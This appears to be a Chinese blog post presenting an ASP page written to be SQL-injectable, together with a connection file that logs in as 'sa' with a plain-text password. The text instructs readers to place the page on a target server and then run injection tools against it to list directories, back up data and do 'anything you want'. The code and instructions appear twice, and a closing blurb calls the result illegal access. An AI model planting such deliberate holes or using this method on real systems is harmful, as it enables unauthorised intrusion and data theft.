<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。
然后输入:http://目标IP/zhuru.asp?id=1
就这么简单,然后用注入工具扫描这个注入点,列目录,备份,一切你想做的!
-----------------------------
conn.asp文件代码:
<%
strSQLServerName = "127.0.0.1" '服务器名称或地址
strSQLDBUserName = "sa" '数据库帐号
strSQLDBPassword = "123456789" '数据库密码
strSQLDBName = "db_database" '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。
然后输入:http://目标IP/zhuru.asp?id=1
就这么简单,然后用注入工具扫描这个注入点,列目录,备份,一切你想做的!
-----------------------------
conn.asp文件代码:
<%
strSQLServerName = "127.0.0.1" '服务器名称或地址
strSQLDBUserName = "sa" '数据库帐号
strSQLDBPassword = "123456789" '数据库密码
strSQLDBName = "db_database" '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>
本文通过一个具体的案例展示了如何利用SQL注入漏洞进行攻击。详细解释了构造恶意SQL语句的方法,并演示了如何通过简单的URL参数修改来实现对目标系统的非法访问。
3224

被折叠的 条评论
为什么被折叠?



